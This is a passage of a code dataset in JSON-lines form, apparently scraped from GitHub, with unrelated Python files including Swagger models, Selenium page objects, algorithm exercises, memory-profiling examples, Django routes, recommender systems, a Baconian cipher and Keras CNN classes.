__init__(self, ethernet: EthernetTopEthernet=None): # noqa: E501\n \"\"\"EthernetTop - a model defined in Swagger\n\n :param ethernet: The ethernet of this EthernetTop. # noqa: E501\n :type ethernet: EthernetTopEthernet\n \"\"\"\n self.swagger_types = {\n 'ethernet': EthernetTopEthernet\n }\n\n self.attribute_map = {\n 'ethernet': 'ethernet'\n }\n\n self._ethernet = ethernet\n\n @classmethod\n def from_dict(cls, dikt) -> 'EthernetTop':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The EthernetTop of this EthernetTop. 
# noqa: E501\n :rtype: EthernetTop\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def ethernet(self) -> EthernetTopEthernet:\n \"\"\"Gets the ethernet of this EthernetTop.\n\n\n :return: The ethernet of this EthernetTop.\n :rtype: EthernetTopEthernet\n \"\"\"\n return self._ethernet\n\n @ethernet.setter\n def ethernet(self, ethernet: EthernetTopEthernet):\n \"\"\"Sets the ethernet of this EthernetTop.\n\n\n :param ethernet: The ethernet of this EthernetTop.\n :type ethernet: EthernetTopEthernet\n \"\"\"\n\n self._ethernet = ethernet\n","repo_name":"ajragusa/OpenConfigAPI","sub_path":"python-flask/swagger_server/models/ethernet_top.py","file_name":"ethernet_top.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8664122141","text":"from ioffice.base import BasePageSection, IOFrameDialog\nfrom selenium.webdriver.common.by import By\n\n\nclass DeleteTaskOptionsDialog(BasePageSection, IOFrameDialog):\n\n def __init__(self, client_id, plan_id, parent_page, current_frame=None):\n super().__init__(parent_page)\n self.FRAME = (By.XPATH, DeleteTaskOptionsDialog.Locators._FRAME.format(client_id, plan_id))\n self.frame_locator = self.FRAME\n self.prev_frame_locator = current_frame\n self._switch_to_frame()\n\n def click_ok(self):\n self.page.click(DeleteTaskOptionsDialog.Locators.OK_BUTTON)\n return self\n\n class Locators(object):\n _FRAME = \"//iframe[@src='/nio/plan/{0}/OpenYesNoDialog/{1}']\"\n OK_BUTTON = (By.LINK_TEXT, \"Ok\")\n","repo_name":"intelliflovrk/raj_test_io","sub_path":"ioffice/plans/delete_task_options_dialog.py","file_name":"delete_task_options_dialog.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35158817153","text":"def solution(triangle):\n dp = triangle\n n = len(triangle)\n\n for i in range(1, n):\n for j in range(i+1):\n # 왼쪽 끝인 경우\n if j == 0:\n dp[i][j] = dp[i-1][j] + triangle[i][j]\n # 오른쪽 끝인 경우\n elif j == i:\n dp[i][j] = dp[i-1][j-1] + triangle[i][j]\n # 그 외\n else:\n dp[i][j] = max(dp[i-1][j-1], dp[i-1][j]) + triangle[i][j]\n \n return max(dp[n-1])\n","repo_name":"J-A-Y2/Algorithm","sub_path":"프로그래머스/3/43105. 
정수 삼각형/정수 삼각형.py","file_name":"정수 삼각형.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4025427052","text":"# 1) objgraph\n# https://pypi.org/project/objgraph/\nx = []\ny = [x, [x], dict(x=x)]\nimport objgraph\nobjgraph.show_refs([y], filename='sample-graph.png')\n\n#2) memory_profiler\n# https://github.com/pythonprofilers/memory_profiler\nfrom memory_profiler import profile\n\n\n@profile\ndef my_func():\n a = [1] * (10 ** 6)\n b = [2] * (2 * 10 ** 7)\n del b\n return a\n\nmy_func()\n\n# Line # Mem usage Increment Occurrences Line Contents\n# =============================================================\n# 13 67.4 MiB 67.4 MiB 1 @profile\n# 14 def my_func():\n# 15 74.9 MiB 7.5 MiB 1 a = [1] * (10 ** 6)\n# 16 227.5 MiB 152.6 MiB 1 b = [2] * (2 * 10 ** 7)\n# 17 75.1 MiB -152.4 MiB 1 del b\n# 18 75.1 MiB 0.0 MiB 1 return a\n#\n#\n#\n# Process finished with exit code 0\n\n# Time-based memory usage\n# mprof run \n# mprof plot\n\n\n# 3) guppy3\n# https://github.com/zhuyifei1999/guppy3/\n\nfrom guppy import hpy\n\nh=hpy()\nprint(h.heap())\n\n\nprint(h.heap().byid[0].sp)\n\nprint(h.iso(1,[],{}))\n\n","repo_name":"AleksNeStu/projects","sub_path":"debug/001_memory_leaks/001_debug_leaks_in_flask/03_tools.py","file_name":"03_tools.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7116575815","text":"from django.urls import path\nfrom .views import CurrentSubscriptionView, user_create, user_login, user_profile, user_logout, user_update, create_payment_info, \\\n UserClassView, UnsubscribeView, PaymentHistoryView, PaymentInfoView, delete_payment_info, DropAllClass, UserClassHistoryView\nfrom rest_framework.authtoken.views import obtain_auth_token\n\napp_name = 'user'\nurlpatterns = [\n path('register/', user_create, name='register'),\n path('login/', user_login, name='login'),\n path('profile/', user_profile, name='profile'),\n path('logout/', user_logout, name='logout'),\n path('subscription/', CurrentSubscriptionView.as_view(), name='current_subscriptions'),\n path('update/', user_update, name='update'),\n path('profile/payment_info/create/', create_payment_info, name='create_payment_info'),\n path('classes/', UserClassView.as_view(), name='user_classes'),\n path('classes/history/', UserClassHistoryView.as_view(), name='user_classes_history'),\n path('classes/drop_all/', DropAllClass.as_view(), name='user_classes_dropall'),\n path('unsubscribe/', UnsubscribeView.as_view(), name='unsubscribe'),\n path('payment/history/', PaymentHistoryView.as_view(), name='payment_history'),\n path('profile/payment_info/list', PaymentInfoView.as_view(), name='payment_info'),\n path('profile/payment_info/delete', delete_payment_info, name='delete_payment_info')\n]\n","repo_name":"tamanoir0211/csc309-project","sub_path":"PF/backend/TFC/User/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26051518101","text":"from __future__ import unicode_literals, print_function\n\nfrom django.contrib.auth import get_user_model\nfrom django.conf import settings\nfrom mogi.models.models_isa import Investigation, Assay\nfrom mogi.forms.forms_isa import UploadAssayDataFilesForm\nfrom mogi.utils.isa_upload import upload_assay_data_files_dir\n\n\n\ndef map_assays_to_files(assay_mapping, user_id, 
study_id, celery_obj):\n User = get_user_model()\n \n count = len(assay_mapping)\n\n user = User.objects.get(id=user_id)\n c = 0\n\n\n for row in assay_mapping:\n if celery_obj:\n celery_obj.update_state(state='RUNNING',\n meta={'current': c, 'total': count, 'status': 'Updating assays'})\n\n assay_match = Assay.objects.filter(study_id=study_id, name=row['assay'])\n\n if not assay_match:\n assay = Assay(study_id=study_id, name=row['assay'])\n assay.save()\n else:\n if row['replace'] == 'yes':\n assay_match.delete()\n assay = Assay(study_id=study_id, name=row['assay'])\n assay.save()\n else:\n assay = assay_match[0]\n\n assay_id = assay.id\n if row['save_as_link']=='yes':\n save_as_link=True\n else:\n save_as_link=False\n\n \n\n\n return 1\n\n\ndef map_assays_to_directories(assay_mapping, user_id, study_id, celery_obj):\n\n count = len(assay_mapping)\n\n user = User.objects.get(id=user_id)\n c = 0\n\n for row in assay_mapping:\n if celery_obj:\n celery_obj.update_state(state='RUNNING',\n meta={'current': c, 'total': count, 'status': 'Updating assays'})\n\n # full_dir_pth = os.path.join(edrs[row['dir_tag']]['path'], username, row['dir'])\n\n assay_match = Assay.objects.filter(study_id=study_id, name=row['assay_name'])\n\n if not assay_match:\n assay = Assay(study_id=study_id, name=row['assay_name'])\n assay.save()\n else:\n if row['replace'] == 'yes':\n assay_match.delete()\n assay = Assay(study_id=study_id, name=row['assay_name'])\n assay.save()\n else:\n assay = assay_match[0]\n\n assay_id = assay.id\n if row['save_as_link']=='yes':\n save_as_link=True\n else:\n save_as_link=False\n\n data_in = {'recursive': True,\n row['dir_tag']: row['dir'],\n 'create_assay_details': True,\n 'use_directories':True,\n 'save_as_link': save_as_link}\n\n form = UploadAssayDataFilesForm(user=User.objects.get(id=user_id),\n data=data_in,\n assayid=assay_id)\n\n if form.is_valid():\n \n create_assay_details = form.cleaned_data['create_assay_details']\n save_as_link = form.cleaned_data['save_as_link']\n\n upload_assay_data_files_dir(form.filelist,\n user.username,\n form.mapping_l,\n assay_id,\n create_assay_details,\n save_as_link,\n '')\n else:\n print(form.errors)\n if celery_obj:\n celery_obj.update_state(state='FAILURE-KNOWN',\n meta={'current': 0, 'total': 1, 'status': form.errors.as_json()})\n return 0\n c += 1\n return 1\n\n","repo_name":"computational-metabolomics/django-mogi","sub_path":"mogi/utils/assaymapping.py","file_name":"assaymapping.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"34659448326","text":"import os\nimport pickle\nimport time\nimport logging\n\nimport numpy\nfrom scipy.sparse import lil_matrix\nfrom scipy.sparse import csr_matrix\n\nimport tongue\nfrom parsers.parser100k import Parser100K\nfrom parsers.parser20m import Parser20M\nfrom predictors import combinedpredictor, userbasedpredictor, moviebasedpredictor, uniformpredictor, matrixfactorizationpredictor\n\n\nclass Main(object):\n\tdef __init__(self):\n\t\tself.init_logging()\n\t\trecommender_environment = {tongue.ML_100K: {'parser': Parser100K, 'data_file_name': tongue.ML_100K_FILE_NAME, 'possible_values': numpy.arange(1, 6)},\n\t\t\t\t\t\t\t\t\ttongue.ML_20M: {'parser': Parser20M, 'data_file_name': tongue.ML_20M_FILE_NAME, 'possible_values': numpy.arange(1, 5.5, 0.5)}}\n\t\tfor data_set_folder_name, environment in recommender_environment.items():\n\t\t\tif not os.path.exists(os.path.join(tongue.PARSED_DATA_PATH, 
data_set_folder_name)):\n\t\t\t\tos.makedirs(os.path.join(tongue.PARSED_DATA_PATH, data_set_folder_name))\n\t\t\t\tself.init_parser(data_set_folder_name, environment)\n\t\t\tself.init_uniform_predictor(data_set_folder_name, environment)\n\t\t\tself.init_user_based_predictor(data_set_folder_name, environment)\n\t\t\tself.init_movie_based_predictor(data_set_folder_name, environment)\n\t\t\tself.init_combined_predictor(data_set_folder_name, environment)\n\t\t\tself.init_matrix_factorization_predictor(data_set_folder_name)\n\n\tdef init_logging(self):\n\t\tlogging.basicConfig(format = '%(asctime)s %(levelname)s %(message)s', level = logging.DEBUG)\n\n\tdef init_parser(self, data_set_folder_name, environment):\n\t\tos.makedirs(tongue.PARSED_DATA_PATH, exist_ok=True)\n\t\tstart_time = time.time()\n\t\tlogging.info(\"Parsing: %s\" % data_set_folder_name)\n\t\tparser = environment['parser'](file_path = os.path.join(data_set_folder_name, environment['data_file_name']))\n\t\tratings_matrix = parser.create_ratings_matrix()\n\t\ttraining_set, testing_set = self.__split_ratings_matrix_to_training_and_testing(ratings_matrix, 80)\n\t\twith open(os.path.join(tongue.PARSED_DATA_PATH, data_set_folder_name, tongue.RATING_MATRIX_FILE_NAME), 'wb') as f:\n\t\t\tpickle.dump(ratings_matrix, f)\n\t\twith open(os.path.join(tongue.PARSED_DATA_PATH, data_set_folder_name, tongue.TRAINING_SET_FILE_NAME), 'wb') as f:\n\t\t\tpickle.dump(training_set, f)\n\t\twith open(os.path.join(tongue.PARSED_DATA_PATH, data_set_folder_name, tongue.TESTING_SET_FILE_NAME), 'wb') as f:\n\t\t\tpickle.dump(testing_set, f)\n\t\tlogging.info(\"Parsed in: %s seconds\" % (time.time() - start_time))\n\n\tdef init_uniform_predictor(self, data_set_folder_name, environment):\n\t\tpredictor = uniformpredictor.UniformPredictor()\n\t\tself.init_generic_predictor(data_set_folder_name, predictor, environment)\n\n\tdef init_user_based_predictor(self, data_set_folder_name, environment):\n\t\tpredictor = userbasedpredictor.UserBasedPredictor()\n\t\tself.init_generic_predictor(data_set_folder_name, predictor, environment)\n\n\tdef init_movie_based_predictor(self, data_set_folder_name, environment):\n\t\tpredictor = moviebasedpredictor.MovieBasedPredictor()\n\t\tself.init_generic_predictor(data_set_folder_name, predictor, environment)\n\n\tdef init_combined_predictor(self, data_set_folder_name, environment):\n\t\tpredictor = combinedpredictor.CombinedPredictor()\n\t\tself.init_generic_predictor(data_set_folder_name, predictor, environment)\n\n\tdef init_matrix_factorization_predictor(self, data_set_folder_name):\n\t\tpredictor = matrixfactorizationpredictor.MatrixFactorizationPredictor()\n\t\tself.init_generic_predictor(data_set_folder_name, predictor)\n\n\tdef init_generic_predictor(self, data_set_folder_name, predictor, environment = {}):\n\t\tlogging.info(\"(%s) Predicting: %s\" % (predictor.name(), data_set_folder_name))\n\t\tstart_time = time.time()\n\t\tpredictor.train(os.path.join(tongue.PARSED_DATA_PATH, data_set_folder_name, tongue.TRAINING_SET_FILE_NAME))\n\t\tlogging.info(\"(%s) Finished training for: %s. trained in: %s seconds\" % (predictor.name(), data_set_folder_name, time.time() - start_time))\n\t\tstart_time = time.time()\n\t\tmae = predictor.predict(os.path.join(tongue.PARSED_DATA_PATH, data_set_folder_name, tongue.TESTING_SET_FILE_NAME), environment.get('possible_values'))\n\t\tlogging.info(\"(%s) Finished prediction for: %s. mae: %s. 
predicted in: %s seconds\" % (predictor.name(), data_set_folder_name, mae, time.time() - start_time))\n\n\tdef __split_ratings_matrix_to_training_and_testing(self, ratings_matrix, training_percentage = 80):\n\t\ttraining_set, testing_set = lil_matrix(ratings_matrix.shape), lil_matrix(ratings_matrix.shape)\n\t\trows_non_zero, cols_non_zero = ratings_matrix.nonzero()\n\t\tfor i in range(len(rows_non_zero)):\n\t\t\tcurrent_row, current_col = rows_non_zero[i], cols_non_zero[i]\n\t\t\tcurrent_rating = ratings_matrix[current_row, current_col]\n\t\t\trandom_roll = numpy.random.randint(0, 100)\n\t\t\tif random_roll <= training_percentage:\n\t\t\t\ttraining_set[current_row, current_col] = current_rating\n\t\t\telse:\n\t\t\t\ttesting_set[current_row, current_col] = current_rating\n\n\t\treturn csr_matrix(training_set), csr_matrix(testing_set)\n\n\nif __name__ == \"__main__\":\n\tMain()\n","repo_name":"zingero/recommenders","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6090235912","text":"# coding: utf-8\n\nimport numpy as np\nimport sys\nimport os\n\nfrom PIL import Image\n\nfrom pylibfreenect2 import Freenect2, SyncMultiFrameListener\nfrom pylibfreenect2 import FrameType, Registration, Frame\nfrom pylibfreenect2 import createConsoleLogger, setGlobalLogger\nfrom pylibfreenect2 import LoggerLevel\n\ntry:\n from pylibfreenect2 import OpenGLPacketPipeline\n pipeline = OpenGLPacketPipeline()\nexcept:\n try:\n from pylibfreenect2 import OpenCLPacketPipeline\n pipeline = OpenCLPacketPipeline()\n except:\n from pylibfreenect2 import CpuPacketPipeline\n pipeline = CpuPacketPipeline()\nprint(\"Packet pipeline:\", type(pipeline).__name__)\n\n# Create and set logger\nlogger = createConsoleLogger(LoggerLevel.Debug)\nsetGlobalLogger(logger)\n\nfn = Freenect2()\nnum_devices = fn.enumerateDevices()\nif num_devices == 0:\n print(\"No device connected!\")\n sys.exit(1)\n\nserial = fn.getDeviceSerialNumber(0)\ndevice = fn.openDevice(serial, pipeline=pipeline)\n\nlistener = SyncMultiFrameListener(\n FrameType.Color | FrameType.Ir | FrameType.Depth)\n\n# Register listeners\ndevice.setColorFrameListener(listener)\ndevice.setIrAndDepthFrameListener(listener)\n\ndevice.start()\n\n# NOTE: must be called after device.start()\nregistration = Registration(device.getIrCameraParams(),\n device.getColorCameraParams())\n\nundistorted = Frame(512, 424, 4)\nregistered = Frame(512, 424, 4)\n\n# Optinal parameters for registration\n# set True if you need\nneed_bigdepth = False\nneed_color_depth_map = False\n\nbigdepth = Frame(1920, 1082, 4) if need_bigdepth else None\ncolor_depth_map = np.zeros((424, 512), np.int32).ravel() \\\n if need_color_depth_map else None\n\n#while True:\nframes = listener.waitForNewFrame()\n\ncolor = frames[\"color\"]\nir = frames[\"ir\"]\ndepth = frames[\"depth\"]\n\nregistration.apply(color, depth, undistorted, registered,\n bigdepth=bigdepth,\n color_depth_map=color_depth_map)\n\n#VIS HERE\nj = Image.fromarray(color.asarray())\nj.save(os.path.join(\"/home/user\", \"testimg.png\"))\n# YAY\n##\n\nlistener.release(frames)\n\n\ndevice.stop()\ndevice.close()\n\nsys.exit(0)\n","repo_name":"APoljakow/Projekt360","sub_path":"DataGenCode/singleImageTest/storeImage.py","file_name":"storeImage.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 
+{"seq_id":"31979024638","text":"lookup = {'A':'aaaaa', 'B':'aaaab', 'C':'aaaba', 'D':'aaabb', 'E':'aabaa', \n 'F':'aabab', 'G':'aabba', 'H':'aabbb', 'I':'abaaa', 'J':'abaab', \n 'K':'ababa', 'L':'ababb', 'M':'abbaa', 'N':'abbab', 'O':'abbba', \n 'P':'abbbb', 'Q':'baaaa', 'R':'baaab', 'S':'baaba', 'T':'baabb', \n 'U':'babaa', 'V':'babab', 'W':'babba', 'X':'babbb', 'Y':'bbaaa', 'Z':'bbaab'} \n \n# Function to encrypt the string according to the cipher provided \ndef encrypt(message): \n cipher = '' \n for letter in message: \n # checks for space \n if(letter != ' '): \n # adds the ciphertext corresponding to the \n # plaintext from the dictionary \n cipher += lookup[letter] \n else: \n # adds space \n cipher += ' '\n \n return cipher \n\ndef main(): \n message = input(\"Please enter the plaintext : \")\n result = encrypt(message.upper()) \n print (result) \n \n \n#Executes the main function \nif __name__ == '__main__': \n main() \n","repo_name":"SeresAdrian/Crypto-Project","sub_path":"encryption files/encryption/baconianenc.py","file_name":"baconianenc.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"5820716824","text":"# https://leetcode.com/contest/8/problems/add-strings/\n\n\nclass Solution(object):\n def addStrings(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n if num1 == \"\":\n return int(num2)\n\n if num2 == \"\":\n return int(num1)\n\n p1 = len(num1) - 1\n p2 = len(num2) - 1\n\n greater = max(len(num1), len(num2))\n total = \"\"\n carry = 0\n\n while greater > 0:\n digit1 = int(num1[p1]) if p1 >= 0 else 0\n digit2 = int(num2[p2]) if p2 >= 0 else 0\n\n sum = carry + digit1 + digit2\n final_digit = sum % 10\n carry = sum // 10\n\n total = str(final_digit) + total\n greater -= 1\n\n p1 -= 1\n p2 -= 1\n\n if carry != 0:\n total = str(carry) + total\n\n return total\n\nimport unittest\n\nclass UnitTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.soln = Solution()\n\n def testAddStrings(self):\n self.assertEqual(self.soln.addStrings(\"112\", \"113\"), \"225\")\n self.assertEqual(self.soln.addStrings(\"10\", \"5\"), \"15\")\n self.assertEqual(self.soln.addStrings(\"1000\", \"5\"), \"1005\")\n self.assertEqual(self.soln.addStrings(\"1\", \"9\"), \"10\")\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"ssarangi/algorithms","sub_path":"leetcode/contest8/add_strings.py","file_name":"add_strings.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"26992872923","text":"from collections import deque\n\n# 0으로 이루어진 bridge를 만듦\ndef buildBridge(bridgeLength):\n bridge = deque([])\n for i in range(bridgeLength):\n bridge.append(0)\n return bridge\n\ndef solution(bridge_length, weight, truck_weights):\n bridge = buildBridge(bridge_length)\n truckDeq = deque(truck_weights)\n \n timeCnt = 0\n totalWeightSum = 0\n while True:\n if len(truckDeq) > 0: # 남은 트럭이 있을 때\n \n # 다음 트럭이 들어올 수 있으면\n if totalWeightSum - bridge[0] + truckDeq[0] <= weight:\n totalWeightSum -= bridge[0]\n bridge.popleft()\n bridge.append(truckDeq.popleft())\n timeCnt += 1\n \n totalWeightSum += bridge[-1]\n\n else: # 다음 트럭이 들어오지 못하면\n totalWeightSum -= bridge[0]\n bridge.popleft()\n bridge.append(0)\n timeCnt += 1\n\n else: # 남은 트럭이 없으면\n\n return timeCnt + bridge_length","repo_name":"kwonars/CodingTest","sub_path":"Programmers/[고득점Kit] 스택,큐 - 다리를 지나는 
트럭.py","file_name":"[고득점Kit] 스택,큐 - 다리를 지나는 트럭.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37430436160","text":"import numpy as np\nfrom keras.models import Sequential, load_model\nfrom keras.layers import LSTM, Recurrent, Activation, Dropout, MaxPooling2D, Convolution2D, Dense, Flatten\nfrom keras.preprocessing.image import ImageDataGenerator, Iterator, K\nfrom create_input import load_sequences_with_paths\nfrom PIL import Image\nimport random\nfrom keras.applications.vgg16 import VGG16\n\n\nclass PHImageIterator(Iterator):\n def __init__(self, directory, image_data_generator, target_size=(90, 160), color_mode='rgb',\n classes=None, class_mode='categorical',\n batch_size=32, shuffle=True, seed=88,\n train=True, test_size=0.2, labels_dict=None):\n seq_img_paths, seq_labels, instances, labels_list = load_sequences_with_paths(directory, labels_dict)\n if labels_dict is not None:\n labels_list = list(range(max(labels_dict.values())+1))\n print(labels_list)\n n_test_instances = int(test_size*len(seq_labels))\n n_train_instances = len(seq_labels) - n_test_instances\n train_test = [1]*n_train_instances + [0]*n_test_instances\n random.shuffle(train_test)\n if train:\n idx = [i for i,v in enumerate(train_test) if v == 1]\n else:\n idx = [i for i,v in enumerate(train_test) if v == 0]\n\n seq_img_paths = [seq_img_paths[i] for i in idx]\n seq_labels = [seq_labels[i] for i in idx]\n\n\n sample = [np.array(Image.open(paths[random.randint(0, len(paths) - 1)])) / 255.0 for paths in seq_img_paths]\n sample = [img for img in sample if len(img.shape)==3]\n sample = np.array(sample)\n print(sample.shape)\n image_data_generator.fit(sample)\n\n self.paths, self.labels = [],[]\n for i in range(len(seq_labels)):\n self.paths += seq_img_paths[i]\n self.labels += seq_labels[i]\n\n instances = [instances[i] for i in idx]\n\n n_instances = len(instances)\n self.n_labels = len(labels_list)\n super(PHImageIterator, self).__init__(n_instances, batch_size, shuffle, seed)\n self.directory = directory\n self.image_data_generator = image_data_generator\n self.target_size = target_size\n self.image_size = self.target_size + (3,)\n\n def next(self):\n with self.lock:\n index_array, current_index, current_batch_size = next(self.index_generator)\n\n batch_x = np.zeros((current_batch_size, ) + self.image_size, dtype=K.floatx())\n batch_y = np.zeros((current_batch_size, self.n_labels), dtype=int)\n for i, idx in enumerate(index_array):\n path = self.paths[idx]\n label = self.labels[idx]\n img = np.array(Image.open(path))\n #print(img.shape, batch_x[i, j].shape)\n batch_x[i,] = img/255.0\n batch_y[i, label] = 1\n return batch_x, batch_y\n\nclass PHImageDataGenerator(ImageDataGenerator):\n def flow_from_directory(self, directory,\n target_size=(90, 160), color_mode='rgb',\n classes=None, class_mode='categorical',\n batch_size=32, shuffle=True, seed=88,\n save_to_dir=None,\n save_prefix='',\n save_format='jpeg',\n follow_links=False,\n train=True, labels_dict=None\n ):\n return PHImageIterator(directory, self, target_size=target_size, color_mode=color_mode, classes=classes,\n class_mode=color_mode, batch_size=batch_size, shuffle=shuffle, seed=seed,\n train=train, labels_dict=labels_dict)\n\n\nclass CNN(object):\n def __init__(self, n_classes, nb_filters=[128,96,64],batch_size=64, n_epochs=500, optimizer=\"adam\", learning_rate=0.001, saved_model=None):\n self.batch_size = batch_size\n self.n_epochs = n_epochs\n 
self.optimizer = optimizer\n self.learning_rate = learning_rate\n self.model = None\n self.n_classes = n_classes\n self.saved_model = saved_model\n self.nb_filters = nb_filters\n\n def create_model(self):\n if self.saved_model is not None:\n self.model = load_model(self.saved_model)\n else:\n self.model = Sequential()\n self.model.add(Convolution2D(self.nb_filters[0], 3, 3, input_shape=(90, 160, 3)))\n self.model.add(Activation('relu'))\n self.model.add(MaxPooling2D(pool_size=(2, 2)))\n self.model.add(Dropout(0.25))\n for nb_filter in self.nb_filters[1:]:\n self.model.add(Convolution2D(nb_filter, 3, 3))\n self.model.add(Activation('relu'))\n self.model.add(MaxPooling2D(pool_size=(2, 2)))\n self.model.add(Dropout(0.25))\n self.model.add(Flatten())\n\n self.model.add(Dense(self.nb_filters[-1])) # returns a sequence of vectors of dimension 32\n self.model.add(Dense(self.n_classes, activation='softmax'))\n\n self.model.compile(loss='categorical_crossentropy',\n optimizer=self.optimizer,\n metrics=['accuracy', 'fmeasure', 'categorical_accuracy'],\n learning_rate=self.learning_rate)\n\n def fit(self, X, Y):\n self.create_model()\n self.model.fit(X, Y,\n batch_size=self.batch_size,\n nb_epoch=self.n_epochs,\n shuffle=True)\n\n def fit_generator(self, train_generator, validation_generator=None, samples_per_epoch=4096, nb_epoch=50,\n nb_val_samples=400):\n self.create_model()\n self.model.fit_generator(\n train_generator,\n samples_per_epoch=samples_per_epoch,\n nb_epoch=nb_epoch,\n validation_data=validation_generator,\n nb_val_samples=nb_val_samples)\n\n def predict_proba(self, X):\n self.model.predict_proba(X)\n\n def predict(self, X):\n self.model.predict_proba(X)\n\n\nclass CNNVGG16(CNN):\n def create_model(self):\n if self.saved_model is not None:\n self.model = load_model(self.saved_model)\n else:\n self.model = Sequential()\n self.model.add(VGG16(weights='imagenet', include_top=False, input_shape=(90,160,3)))\n self.model.add(Flatten())\n self.model.add(Dense(64)) # returns a sequence of vectors of dimension 32\n self.model.add(Dense(self.n_classes, activation='softmax'))\n\n self.model.compile(loss='categorical_crossentropy',\n optimizer=self.optimizer,\n metrics=['accuracy', 'fmeasure', 'categorical_accuracy'],\n learning_rate=self.learning_rate)","repo_name":"aomelo/posrec","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":6909,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"27645902704","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport re\n\n\ndef get_title_from_index(index,df):\n\n return df[df.index == index][\"OrganizationName\"].values[0]\n\ndef get_index_from_title(title,df):\n\n return df[df.OrganizationName == title][\"index\"].values[0]\n\ndef extract_database():\n\n df = pd.read_csv(\"ccc-organizations-2011_1.csv\")\n return df\n\ndef pre_process(tweets):\n\n for i in range(0, len(tweets)):\n\n if (tweets[i] is not None):\n\n if(tweets[i]!=tweets[i]):\n tweets[i]=\"\"\n\n tweets[i] = tweets[i].lower() # To lower case\n tweets[i] = tweets[i].replace('@','') # remove @\n tweets[i] = tweets[i].replace('#','') # remove #\n tweets[i] = remove_urls(tweets[i]) # remove URL\n tweets[i] = remove_emojis(tweets[i]) # remove emojis\n tweets[i] = \"\".join(j for j in 
tweets[i] if j not in (\n \"?\", \".\", \";\", \":\", \"!\", \"-\", \",\", \"[\", \"]\", \"(\", \")\", \"’\", \"‘\", '\"', \"$\", \"'\", \"“\", \"”\", \"•\", \"=\", \"+\",\n \"%\", \"/\", \"&\", \"|\", \"~\")) # remove punctuations\n\n return tweets\n\ndef remove_urls (str):\n\n str = re.sub(r'(https|http)?:\\/\\/(\\w|\\.|\\/|\\?|\\=|\\&|\\%)*\\b', '', str, flags=re.MULTILINE)\n return(str)\n\n\ndef remove_emojis(data):\n\n emoji = re.compile(\"[\"\n u\"\\U0001F600-\\U0001F64F\" # emoticons\n u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n u\"\\U00002500-\\U00002BEF\" # chinese char\n u\"\\U00002702-\\U000027B0\"\n u\"\\U00002702-\\U000027B0\"\n u\"\\U000024C2-\\U0001F251\"\n u\"\\U0001f926-\\U0001f937\"\n u\"\\U00010000-\\U0010ffff\"\n u\"\\u2640-\\u2642\" \n u\"\\u2600-\\u2B55\"\n u\"\\u200d\"\n u\"\\u23cf\"\n u\"\\u23e9\"\n u\"\\u231a\"\n u\"\\ufe0f\" # dingbats\n u\"\\u3030\"\n \"]+\", re.UNICODE)\n return re.sub(emoji, '', data)\n\n\ndef generate_movie_data(description,actors):\n\n result=[]\n for i in range(0,len(description)):\n result.append(description[i]+\" \"+actors[i])\n\n return result\n\ndef print_similar(sorted_movies,movie_index,df):\n\n print(\"\\nRecommendations : \\n\")\n\n i = 0\n for element in sorted_movies:\n\n if (element[0] != movie_index):\n print(get_title_from_index(element[0], df))\n i = i + 1\n if i > 50:\n break\n\n\ndef main():\n\n features = ['Description', 'City']\n df=extract_database()\n df['index']=df.index\n description = df['Description'].to_list()\n city=df['City'].to_list()\n description=pre_process(description)\n city=pre_process(city)\n charity_data=generate_movie_data(description,city)\n\n cv=CountVectorizer()\n count_matrix=cv.fit_transform(charity_data)\n\n\n cos_sim=cosine_similarity(count_matrix)\n sample_movie=input(\"Enter the charity user had previously donated to: \")\n\n chairty_index=get_index_from_title(sample_movie,df)\n similar_charities=list(enumerate(cos_sim[chairty_index]))\n sorted_charities=sorted(similar_charities,key=lambda x:x[1],reverse=True)\n\n print_similar(sorted_charities,chairty_index,df)\n\nif __name__ == \"__main__\":\n\n main()\n\n\n","repo_name":"gouriginde/Summer2021","sub_path":"Zeeshan/us_charities.py","file_name":"us_charities.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2788166847","text":"# 2. 
